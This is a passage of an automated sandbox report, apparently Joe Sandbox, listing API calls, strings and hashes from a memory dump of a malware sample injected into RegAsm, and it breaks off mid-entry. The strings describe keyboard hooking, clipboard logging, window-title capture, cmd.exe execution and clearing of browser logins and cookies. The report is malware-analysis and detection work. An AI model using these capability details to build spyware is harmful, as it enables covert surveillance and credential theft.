                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Exception@8Throw
                                                                                                        • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                        • API String ID: 2005118841-1866435925
                                                                                                        • Opcode ID: 393980db8800f491ea7c1a59f80fc085f11d752c19bfb05bf36f8e27219a3784
                                                                                                        • Instruction ID: 287a1f786264602a2f100ba68ee8cd07dacd1bfc9ef62352ff5e55a88b78f620
                                                                                                        • Opcode Fuzzy Hash: 393980db8800f491ea7c1a59f80fc085f11d752c19bfb05bf36f8e27219a3784
                                                                                                        • Instruction Fuzzy Hash: 59018F626583087AEB14B697CC03FBA33685B10708F10CC3BBD01765C2EA7D6A61C66F
                                                                                                        APIs
                                                                                                        • RegCreateKeyW.ADVAPI32(80000001,00000000,004752D8), ref: 0041385A
                                                                                                        • RegSetValueExW.ADVAPI32 ref: 00413888
                                                                                                        • RegCloseKey.ADVAPI32(004752D8), ref: 00413893
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseCreateValue
                                                                                                        • String ID: pth_unenc
                                                                                                        • API String ID: 1818849710-4028850238
                                                                                                        • Opcode ID: 5c236e770f027b7b6dfc699725bd7ba66defa52264e3e321846078cfa9e8a7ba
                                                                                                        • Instruction ID: 9133f253890910ff78e8f434c24b82038cc7026402723a24ca4ec17c3e6d8cb5
                                                                                                        • Opcode Fuzzy Hash: 5c236e770f027b7b6dfc699725bd7ba66defa52264e3e321846078cfa9e8a7ba
                                                                                                        • Instruction Fuzzy Hash: 15F0C271440218FBCF00AFA1EC45FEE376CEF00756F10452AF905A61A1E7759E04DA94
                                                                                                        APIs
                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0040DFEC
                                                                                                        • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040E02B
                                                                                                          • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 004356EC
                                                                                                          • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 00435710
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E051
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                                                                        • String ID: bad locale name
                                                                                                        • API String ID: 3628047217-1405518554
                                                                                                        • Opcode ID: 358b3f1522e08b03a3202c9f95d61a93da44700bf44d5321e5e8d61ced44f7e6
                                                                                                        • Instruction ID: 7f9ccd90240ef42149755af47b5df127ed13e8783c268b42739d505c0e35a915
                                                                                                        • Opcode Fuzzy Hash: 358b3f1522e08b03a3202c9f95d61a93da44700bf44d5321e5e8d61ced44f7e6
                                                                                                        • Instruction Fuzzy Hash: 77F08131544A085AC338FA62D863DDA73B49F14358F50457FB406268D2EF78BA0CCA9D
                                                                                                        APIs
                                                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_0001D4EE,00000000,00000000,00000000), ref: 00416C82
                                                                                                        • ShowWindow.USER32(00000009), ref: 00416C9C
                                                                                                        • SetForegroundWindow.USER32 ref: 00416CA8
                                                                                                          • Part of subcall function 0041CE2C: AllocConsole.KERNEL32 ref: 0041CE35
                                                                                                          • Part of subcall function 0041CE2C: ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                                                                                                          • Part of subcall function 0041CE2C: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Window$ConsoleShow$AllocCreateForegroundOutputThread
                                                                                                        • String ID: !D@
                                                                                                        • API String ID: 3446828153-604454484
                                                                                                        • Opcode ID: c95d4037f996435fc130d7113ec89fe5e4aa0dd425f9b60b55efc54c96c60bf0
                                                                                                        • Instruction ID: 9f5213224becab59645eda34593d96b16d6ada18beeab21aaf628210512d7754
                                                                                                        • Opcode Fuzzy Hash: c95d4037f996435fc130d7113ec89fe5e4aa0dd425f9b60b55efc54c96c60bf0
                                                                                                        • Instruction Fuzzy Hash: ECF05E70149340EAD720AB62ED45AFA7B69EB54341F01487BF909C20F2DB389C94865E
                                                                                                        APIs
                                                                                                        • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0041616B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ExecuteShell
                                                                                                        • String ID: /C $cmd.exe$open
                                                                                                        • API String ID: 587946157-3896048727
                                                                                                        • Opcode ID: 6b954565fb865431a8f0571ad86dfb8a094b841cbf93f4f8f4d3cab274959172
                                                                                                        • Instruction ID: 08f4dee505367bf09000beb2be63de5ecd082ae46aa0e0363999309db21c3e05
                                                                                                        • Opcode Fuzzy Hash: 6b954565fb865431a8f0571ad86dfb8a094b841cbf93f4f8f4d3cab274959172
                                                                                                        • Instruction Fuzzy Hash: 5EE0C0B0204305ABC605F675DC96CBF73ADAA94749B50483F7142A20E2EF7C9D49C65D
                                                                                                        APIs
                                                                                                        • TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,004752D8,004752F0,?,pth_unenc), ref: 0040B8F6
                                                                                                        • UnhookWindowsHookEx.USER32 ref: 0040B902
                                                                                                        • TerminateThread.KERNEL32(Function_0000A2A2,00000000,?,pth_unenc), ref: 0040B910
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: TerminateThread$HookUnhookWindows
                                                                                                        • String ID: pth_unenc
                                                                                                        • API String ID: 3123878439-4028850238
                                                                                                        • Opcode ID: e1cbc6e2d6c434028aa849536a2aaf0ad10149223ccd3897ab004e8dbc05b34a
                                                                                                        • Instruction ID: 372ac16de24f92ae7b862ff59389ff52a9cc8b3ac2037ffe6dc6d1e564519698
                                                                                                        • Opcode Fuzzy Hash: e1cbc6e2d6c434028aa849536a2aaf0ad10149223ccd3897ab004e8dbc05b34a
                                                                                                        • Instruction Fuzzy Hash: 71E01272204315EFD7201F909C888667AADEE1539632409BEF6C261BB6CB7D4C54C79D
                                                                                                        APIs
                                                                                                        • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 00401414
                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0040141B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                        • String ID: GetCursorInfo$User32.dll
                                                                                                        • API String ID: 1646373207-2714051624
                                                                                                        • Opcode ID: d896883a00b7c9d91a41f0e937368129b1e8cf7bb1ae53218dcc7360cef0261f
                                                                                                        • Instruction ID: 8b26e8b19aea132afe7ec2793fcae50f4a2deac5c44528798ee909e27cd98dc2
                                                                                                        • Opcode Fuzzy Hash: d896883a00b7c9d91a41f0e937368129b1e8cf7bb1ae53218dcc7360cef0261f
                                                                                                        • Instruction Fuzzy Hash: 6BB092B4981740FB8F102BB0AE4EA193A25B614703B1008B6F046961A2EBB888009A2E
                                                                                                        APIs
                                                                                                        • LoadLibraryA.KERNEL32(User32.dll), ref: 004014B9
                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 004014C0
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                        • String ID: GetLastInputInfo$User32.dll
                                                                                                        • API String ID: 2574300362-1519888992
                                                                                                        • Opcode ID: 97ca63f656fbe05ba3a699769711b358361c41ed64750357eec187df6322536e
                                                                                                        • Instruction ID: d02e03e3b89f99dad65f23c179d95e13f318a7fd709defe56253aab8848571e2
                                                                                                        • Opcode Fuzzy Hash: 97ca63f656fbe05ba3a699769711b358361c41ed64750357eec187df6322536e
                                                                                                        • Instruction Fuzzy Hash: EFB092B8580300FBCB102FA0AD4E91E3A68AA18703B1008A7F441C21A1EBB888009F5F
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: __alldvrm$_strrchr
                                                                                                        • String ID:
                                                                                                        • API String ID: 1036877536-0
                                                                                                        • Opcode ID: 70c324bd787235ec34b4410bef6e6c487e79153caf11c4279a27308c3ab035ac
                                                                                                        • Instruction ID: 8ce1af842cd152cb2b2428f5d584a25f6c9224aafe101b92c03b71ca88d34985
                                                                                                        • Opcode Fuzzy Hash: 70c324bd787235ec34b4410bef6e6c487e79153caf11c4279a27308c3ab035ac
                                                                                                        • Instruction Fuzzy Hash: 87A156729846829FF721CF58C8817AEBBA5FF15314F2841AFE8859B381D27C8C51C75A
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _free
                                                                                                        • String ID:
                                                                                                        • API String ID: 269201875-0
                                                                                                        • Opcode ID: 5a84445a6d60efe319971740dde2d2f541f568e0726df331b0a843d8179482b0
                                                                                                        • Instruction ID: 6f8591e81a910498abf0b0e408487d1c0faf04506bf4bd3dd9e850377c22d226
                                                                                                        • Opcode Fuzzy Hash: 5a84445a6d60efe319971740dde2d2f541f568e0726df331b0a843d8179482b0
                                                                                                        • Instruction Fuzzy Hash: 34413931B00104AAEB207B7A9C4666F3AB5DF45735F570A1FFD28C7293DA7C481D426A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                                                                                                        • Instruction ID: b0a34e1ed6630e1fb57c9e62860a3601010315cd62f19612bff23542d182db60
                                                                                                        • Opcode Fuzzy Hash: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                                                                                                        • Instruction Fuzzy Hash: 70412AB1600704BFE724AF79CD41B5EBBE8EB88714F10462FF145DB281E3B999058798
                                                                                                        APIs
                                                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
                                                                                                        • CreateThread.KERNEL32(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000), ref: 00404DD2
                                                                                                        • CloseHandle.KERNEL32(?), ref: 00404DDB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                                        • String ID:
                                                                                                        • API String ID: 3360349984-0
                                                                                                        • Opcode ID: 32b785115e4945af1cb1ec340ddbe05f8c1abb66e86665c205fa3eab4bab06ae
                                                                                                        • Instruction ID: 30d48123e17294c38ae6f490953f1b42a5ca81467cb0df1087f173bd09261e59
                                                                                                        • Opcode Fuzzy Hash: 32b785115e4945af1cb1ec340ddbe05f8c1abb66e86665c205fa3eab4bab06ae
                                                                                                        • Instruction Fuzzy Hash: 684182B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        • Cleared browsers logins and cookies., xrefs: 0040C130
                                                                                                        • [Cleared browsers logins and cookies.], xrefs: 0040C11F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Sleep
                                                                                                        • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                                                                        • API String ID: 3472027048-1236744412
                                                                                                        • Opcode ID: af2c2d963010d4b9fe0ed32b7540b86f028afa125e63126aea6004068ef018c7
                                                                                                        • Instruction ID: 5a72b8a34604a64e244bad04561a930bad76f77e78bf22f3e088d6afb7384554
                                                                                                        • Opcode Fuzzy Hash: af2c2d963010d4b9fe0ed32b7540b86f028afa125e63126aea6004068ef018c7
                                                                                                        • Instruction Fuzzy Hash: A431A805648381EDD6116BF514967AB7B824A53748F0882BFB8C4373C3DA7A4808C79F
                                                                                                        APIs
                                                                                                          • Part of subcall function 0041C5E2: GetForegroundWindow.USER32 ref: 0041C5F2
                                                                                                          • Part of subcall function 0041C5E2: GetWindowTextLengthW.USER32(00000000), ref: 0041C5FB
                                                                                                          • Part of subcall function 0041C5E2: GetWindowTextW.USER32(00000000,00000000,00000001,00000001,00000000), ref: 0041C625
                                                                                                        • Sleep.KERNEL32(000001F4), ref: 0040A5AE
                                                                                                        • Sleep.KERNEL32(00000064), ref: 0040A638
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Window$SleepText$ForegroundLength
                                                                                                        • String ID: [ $ ]
                                                                                                        • API String ID: 3309952895-93608704
                                                                                                        • Opcode ID: f02f1a0373de4d905e268f57495fa08b349ea431ac4d969b5d726f466b44a1dd
                                                                                                        • Instruction ID: 6255842b65d5da3793f092b3f1447ea5db7efb23f61c0c2d19f8aa6a86066f85
                                                                                                        • Opcode Fuzzy Hash: f02f1a0373de4d905e268f57495fa08b349ea431ac4d969b5d726f466b44a1dd
                                                                                                        • Instruction Fuzzy Hash: CB119F315143006BC614BB26CC579AF77A8AB90348F40083FF552661E3EF79AE18869B
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: fcebbc467d131149bede3708c03e30a5933a8f2bf6fa192c1d79c37d30f8ae05
                                                                                                        • Instruction ID: 2af8e1c260e5220142bf0b5f8a7e988c949d9a3a1697e0ff4d6bcf25ce69da1b
                                                                                                        • Opcode Fuzzy Hash: fcebbc467d131149bede3708c03e30a5933a8f2bf6fa192c1d79c37d30f8ae05
                                                                                                        • Instruction Fuzzy Hash: 7E01F2B26093557EFA202E786CC2F67630DCB51FBAB31033BB520612D2DB68DD40452C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: d36049e99d51c5662ea1cdccde7f001ca18baa555cb14a41c95be32ad22d597f
                                                                                                        • Instruction ID: 437de9af4247593539f95cdbb70b1dc5411192884b5f12beac7b10196549b189
                                                                                                        • Opcode Fuzzy Hash: d36049e99d51c5662ea1cdccde7f001ca18baa555cb14a41c95be32ad22d597f
                                                                                                        • Instruction Fuzzy Hash: CB01ADB26096527ABA202E796CC5E27634CDB42BBA335037BF821512E3DF68DE054169
                                                                                                        APIs
                                                                                                        • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                                                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 0041C543
                                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C568
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0041C576
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: File$CloseCreateHandleReadSize
                                                                                                        • String ID:
                                                                                                        • API String ID: 3919263394-0
                                                                                                        • Opcode ID: eaf6ed3f63b4403b43378431095bcec12dbe7b76bb0b9555606dcebd0a0bb3a0
                                                                                                        • Instruction ID: 4673af35f3eeaf13de89ae80f5e83caf65f56e40ae5cb47f4621101913e6d1ef
                                                                                                        • Opcode Fuzzy Hash: eaf6ed3f63b4403b43378431095bcec12dbe7b76bb0b9555606dcebd0a0bb3a0
                                                                                                        • Instruction Fuzzy Hash: 50F0C2B1241318BFE6101B25ADC9EBB369DDB866A9F10063EF802A22D1DA698D055139
                                                                                                        APIs
                                                                                                        • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                                                                        • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0041C2C4
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0041C2CC
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseHandleOpenProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 39102293-0
                                                                                                        • Opcode ID: e1074fac5642d3b73ea46f905cbac139ffb473db2c7b30d838fbef5372722d9f
                                                                                                        • Instruction ID: 82f86893bb8475317186349f6084970b7a3011258d8579340058f5d8518f4318
                                                                                                        • Opcode Fuzzy Hash: e1074fac5642d3b73ea46f905cbac139ffb473db2c7b30d838fbef5372722d9f
                                                                                                        • Instruction Fuzzy Hash: 9C01F231680215ABD61066949C8AFA7B66C8B84756F0001ABFA08D22A2EF74CD81466A
                                                                                                        APIs
                                                                                                        • ___BuildCatchObject.LIBVCRUNTIME ref: 004398FA
                                                                                                          • Part of subcall function 00439F32: ___AdjustPointer.LIBCMT ref: 00439F7C
                                                                                                        • _UnwindNestedFrames.LIBCMT ref: 00439911
                                                                                                        • ___FrameUnwindToState.LIBVCRUNTIME ref: 00439923
                                                                                                        • CallCatchBlock.LIBVCRUNTIME ref: 00439947
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                                                        • String ID:
                                                                                                        • API String ID: 2633735394-0
                                                                                                        • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                                                                        • Instruction ID: 1eef882e9718bbd9a0ab38cd68ce054dbb3f9d4064fa539f417e17899f1f7293
                                                                                                        • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                                                                        • Instruction Fuzzy Hash: 38010532000109BBCF125F56CC01EDA3BAAEF5C754F05901AF95865221C3BAE862ABA4
                                                                                                        APIs
                                                                                                        • GetSystemMetrics.USER32(0000004C,?,?,?,?,00000000,004194DE,00000000,00000000), ref: 0041942B
                                                                                                        • GetSystemMetrics.USER32(0000004D,?,?,?,?,00000000,004194DE,00000000,00000000), ref: 00419431
                                                                                                        • GetSystemMetrics.USER32(0000004E,?,?,?,?,00000000,004194DE,00000000,00000000), ref: 00419437
                                                                                                        • GetSystemMetrics.USER32(0000004F,?,?,?,?,00000000,004194DE,00000000,00000000), ref: 0041943D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: MetricsSystem
                                                                                                        • String ID:
                                                                                                        • API String ID: 4116985748-0
                                                                                                        • Opcode ID: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                                                                                        • Instruction ID: fd4820a3fb0c8fcfb80096478546269f04700e3de9cdf271d69d174aa35805c7
                                                                                                        • Opcode Fuzzy Hash: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                                                                                        • Instruction Fuzzy Hash: 3FF0A4B1B043155BD700EE758C51A6B6ADAEBD4364F10043FF60887281EFB8DC468B84
                                                                                                        APIs
                                                                                                        • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438FB1
                                                                                                        • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438FB6
                                                                                                        • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438FBB
                                                                                                          • Part of subcall function 0043A4BA: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A4CB
                                                                                                        • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438FD0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                                                        • String ID:
                                                                                                        • API String ID: 1761009282-0
                                                                                                        • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                                                                        • Instruction ID: 3a6c9073cd349407f79861cc5a63413a30b4b1af88e8d748f4708d1390bfb410
                                                                                                        • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                                                                        • Instruction Fuzzy Hash: 8DC04C44080381552C50B6B2110B2AF83521C7E38CF9074DFBDD1579474D5D052F553F
                                                                                                        APIs
                                                                                                        • __startOneArgErrorHandling.LIBCMT ref: 00442D3D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ErrorHandling__start
                                                                                                        • String ID: pow
                                                                                                        • API String ID: 3213639722-2276729525
                                                                                                        • Opcode ID: ba08a0cb9aac2d09af1d9c353536d0054585ad8ee24c5cded07915036f7ff901
                                                                                                        • Instruction ID: 2abd0c7c8e13d4a8cd2c8141c546921d868ac315c0d238e81b652aa6ec7fde8b
                                                                                                        • Opcode Fuzzy Hash: ba08a0cb9aac2d09af1d9c353536d0054585ad8ee24c5cded07915036f7ff901
                                                                                                        • Instruction Fuzzy Hash: 92515AE1E0460296FB167714CE4137B6794AB50741F70497BF0D6823EAEA7C8C859B4F
                                                                                                        APIs
                                                                                                          • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                                                        • __Init_thread_footer.LIBCMT ref: 0040B7D2
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Init_thread_footer__onexit
                                                                                                        • String ID: [End of clipboard]$[Text copied to clipboard]
                                                                                                        • API String ID: 1881088180-3686566968
                                                                                                        • Opcode ID: ed48047f974fffac8e7a9b5da0f857699ac9eabc6e4f24e176e756ae766f8f96
                                                                                                        • Instruction ID: 844f446031992ee5170c212df839aebd4a436c67f2956c9e8fe8aff684c3a130
                                                                                                        • Opcode Fuzzy Hash: ed48047f974fffac8e7a9b5da0f857699ac9eabc6e4f24e176e756ae766f8f96
                                                                                                        • Instruction Fuzzy Hash: 30217131A102198ACB14FBA6D8929EDB375AF54318F10443FE505771D2EF786D4ACA8C
                                                                                                        APIs
                                                                                                        • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00451E12,?,00000050,?,?,?,?,?), ref: 00451C92
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: ACP$OCP
                                                                                                        • API String ID: 0-711371036
                                                                                                        • Opcode ID: 28d359b86f53a769e50845c8979a9c95ba506d3f4f520eddc938968d94c37ac1
                                                                                                        • Instruction ID: 09b953eaa346ea86c897215e5a2a15a508f8bcb16f9b984b1dadcb699cf7d301
                                                                                                        • Opcode Fuzzy Hash: 28d359b86f53a769e50845c8979a9c95ba506d3f4f520eddc938968d94c37ac1
                                                                                                        • Instruction Fuzzy Hash: E821D862A80204A6DB36CF14C941BAB7266DB54B13F568426ED0AD7322F73BED45C35C
                                                                                                        APIs
                                                                                                        • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405030
